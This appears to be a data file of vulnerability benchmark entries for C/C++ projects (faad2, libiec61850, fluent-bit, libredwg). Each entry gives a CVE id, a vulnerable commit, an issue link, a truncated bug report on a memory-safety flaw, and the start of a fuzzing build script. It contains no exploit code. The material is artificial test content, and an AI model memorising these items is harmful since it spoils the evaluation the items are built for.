/src/faad2
[]
faad2.cve-2018-20361
knik0/faad2
6b4a7cde30f2e2cb03e78ef476cc73179cfffda3
https://github.com/knik0/faad2/issues/30
c++
From https://github.com/knik0/faad2/issues/30: From https://github.com/knik0/faad2/issues/30: From https://github.com/knik0/faad2/issues/30: Issue Title: Invalid memory address dereference in hf_assembly (in libfaad/sbr_hfadj.c:1536) Issue Body: Hi, i found a issue in Freeware Advanced Audio Decoder 2 (FAAD2) 2.8.8. I...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2021-32276
knik0/faad2
1073aeef823cafd844704389e9a497c257768e2f
https://github.com/knik0/faad2/issues/58
c++
From https://github.com/knik0/faad2/issues/58: From https://github.com/knik0/faad2/issues/58: Issue Title: A Segmentation fault in output.c:49:16 Issue Body: ## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Confi...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2023-38857
knik0/faad2
1d539788397713968d9660fe9f4e68af526bab73
https://github.com/knik0/faad2/issues/171
c++
From https://github.com/knik0/faad2/issues/171: Issue Title: A heap-buffer-overflow vulnerability found in mp4read.c:449:63 Issue Body: Hi, developers of faad2: In the test of the binary faad([1d53978](https://github.com/knik0/faad2/commit/1d539788397713968d9660fe9f4e68af526bab73)) instrumented with ASAN. There is a h...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2023-38858
knik0/faad2
1d539788397713968d9660fe9f4e68af526bab73
https://github.com/knik0/faad2/issues/173
c++
From https://github.com/knik0/faad2/issues/173: Issue Title: A SEGV vulnerability found in faad2 Issue Body: Hi, developers of faad2: In the test of the binary faad([1d53978](https://github.com/knik0/faad2/commit/1d539788397713968d9660fe9f4e68af526bab73)) instrumented with ASAN. There is a SEGV vulnerability in `faad`...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
libiec61850.cve-2019-19931
mz-automation/libiec61850
23e381fa76d55554da5eed257f3889763801777d
https://github.com/mz-automation/libiec61850/issues/194
c++
From https://github.com/mz-automation/libiec61850/issues/194: From https://github.com/mz-automation/libiec61850/issues/194: Issue Title: Heap overflow in function MmsValue_decodeMmsData mms/iso_mms/server/mms_access_result.c:238 Issue Body: Function `MmsValue_decodeMmsData` has heap overflow vulnerability in file mms/...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]
libiec61850.cve-2020-7054
mz-automation/libiec61850
b4c7cefb154dcd8777e62196e2ca5fceb71a2dcb
https://github.com/mz-automation/libiec61850/issues/200
c++
From https://github.com/mz-automation/libiec61850/issues/200: Issue Title: heap overflow when parsing `MMS_BIT_STRING` in MmsValue_decodeMmsData in mms/iso_mms/server/mms_access_result.c Issue Body: When libiec61850 parsing type `MMS_BIT_STRING`, it doesn't check variable `bufPos`. So we can provide a larger number fo...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]
libiec61850.cve-2021-45769
mz-automation/libiec61850
8eeb6f06b39e4969bc4566d49f72002a7f10353f
https://github.com/mz-automation/libiec61850/issues/368
c++
From https://github.com/mz-automation/libiec61850/issues/368: Issue Title: NULL Pointer Dereference in AcseConnection_parseMessage Issue Body: # NULL Pointer Dereference in AcseConnection_parseMessage ## Description A NULL Pointer Dereference was discovered in AcseConnection_parseMessage at src/mms/iso_acse/acse.c:4...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]
libiec61850.cve-2018-19185
mz-automation/libiec61850
8d728b3ab4b109deef2d889fb9fed93f57d962f2
https://github.com/fouzhe/security/tree/master/libiec61850#another-heap-buffer-overflow-in-function-berencoder_encodeoctetstring
c++
From https://github.com/mz-automation/libiec61850/issues/87: Issue Title: Another heap buffer overflow in function BerEncoder_encodeOctetString Issue Body: This issue seems to be similiar to #81 which is reported several days ago. Although this bug has been fixed, there is **another specific dataSetValue sequence** w...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]
fluent-bit.cve-2019-9749
fluent/fluent-bit
d978659be437b6f6c47997ab748ce8d253627b16
https://github.com/fluent/fluent-bit/issues/1135
c++
From https://github.com/fluent/fluent-bit/issues/1135: From https://github.com/fluent/fluent-bit/issues/1135: Issue Title: Memory corruption in MQTT input plugin leading to crash of the server while processing crafted MQTT message Issue Body: Fluent Bit MQTT input plugin acting as MQTT broker (server) incorrectly hand...
#!/bin/bash -eu # Copyright 2020 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2020 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[]
libredwg.cve-2019-20010
libredwg/libredwg
3f515d52954e2ec009a2508d3d5be04e3bcc094b
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643383
c++
From https://github.com/LibreDWG/libredwg/issues/176: From https://github.com/LibreDWG/libredwg/issues/176: Issue Title: Several bugs found by fuzzing Issue Body: Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocatio...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_dwg_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]
libredwg.cve-2019-20011
libredwg/libredwg
6c82625d94355a652c21666821f899246bfb76cf
https://github.com/LibreDWG/libredwg/issues/176
c++
From https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643439: From https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643439: Issue Title: Several bugs found by fuzzing Issue Body: Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC *...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_dwg_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]
libredwg.cve-2019-20014
libredwg/libredwg
6c82625d94355a652c21666821f899246bfb76cf
https://github.com/LibreDWG/libredwg/issues/176
c++
From https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643172: From https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643172: Issue Title: Several bugs found by fuzzing Issue Body: Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC *...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src
[ { "filename": "fuzz_dwg_decode.options", "content": "[libfuzzer]\ndetect_leaks=0\n" } ]